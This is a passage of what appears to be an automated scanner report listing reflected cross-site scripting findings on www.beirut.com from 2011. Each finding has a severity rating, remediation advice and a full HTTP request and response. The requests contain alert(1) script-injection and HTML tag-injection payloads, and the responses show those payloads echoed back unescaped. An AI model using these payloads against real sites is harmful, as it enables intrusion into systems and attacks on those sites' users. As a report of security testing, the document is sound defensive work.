Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinga81fa'-alert(1)-'2d7ae7ee7d9/Shopping-Centers/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppinga81fa'-alert(1)-'2d7ae7ee7d9/Shopping-Centers/492064852/Shopping-Malls/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1063. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89686"><a>ae9d922780c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping89686"><a>ae9d922780c/Shopping-Centers/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping89686"><a>ae9d922780c">
...[SNIP]...

4.1064. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9882<script>alert(1)</script>ebae0710a1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Shopping-Centersc9882<script>alert(1)</script>ebae0710a1b/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Shopping Centersc9882<script>alert(1)</script>ebae0710a1b <a href="#" id="backlink">
...[SNIP]...

4.1065. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f82d5'-alert(1)-'8ad41671a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centersf82d5'-alert(1)-'8ad41671a0/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:47:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centersf82d5'-alert(1)-'8ad41671a0/492064852/Shopping-Malls/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1066. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d57'-alert(1)-'dfc3e1d1619 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centers/49206485282d57'-alert(1)-'dfc3e1d1619/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:50:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centers/49206485282d57'-alert(1)-'dfc3e1d1619/Shopping-Malls/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1067. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be4f0'-alert(1)-'4a3dd680759 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centers/492064852/Shopping-Mallsbe4f0'-alert(1)-'4a3dd680759/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:57:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Shopping-Centers/492064852/Shopping-Mallsbe4f0'-alert(1)-'4a3dd680759/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1068. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d91'-alert(1)-'24cd2b8df34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centers/492064852/Shopping-Malls/1091d91'-alert(1)-'24cd2b8df34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:01:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centers/492064852/Shopping-Malls/1091d91'-alert(1)-'24cd2b8df34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1069. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Specialized-Stores/2572668008

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c548'-alert(1)-'fff390e69db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping8c548'-alert(1)-'fff390e69db/Specialized-Stores/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping8c548'-alert(1)-'fff390e69db/Specialized-Stores';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1070. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Specialized-Stores/2572668008

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd5fb"><a>190ff575f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingcd5fb"><a>190ff575f9d/Specialized-Stores/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingcd5fb"><a>190ff575f9d">
...[SNIP]...

4.1071. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Specialized-Stores/2572668008

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6737'-alert(1)-'5e490f3ea1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Specialized-Storesa6737'-alert(1)-'5e490f3ea1e/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:55:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Specialized-Storesa6737'-alert(1)-'5e490f3ea1e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1072. http://www.beirut.com/Shopping/Stores-Markets/3546182765 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f97"><a>d9cc57a373c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingb2f97"><a>d9cc57a373c/Stores-Markets/3546182765 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingb2f97"><a>d9cc57a373c">
...[SNIP]...

4.1073. http://www.beirut.com/Shopping/Stores-Markets/3546182765 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a26ff'-alert(1)-'0a504d2863 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinga26ff'-alert(1)-'0a504d2863/Stores-Markets/3546182765 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:02:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppinga26ff'-alert(1)-'0a504d2863/Stores-Markets';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1074. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Department-Store/68

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c1c'-alert(1)-'d145a633f7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping78c1c'-alert(1)-'d145a633f7e/Stores-Markets/3546182765/Department-Store/68 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:04:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping78c1c'-alert(1)-'d145a633f7e/Stores-Markets/3546182765/Department-Store/68';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1075. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Department-Store/68

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d47e"><a>acdaeb12181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

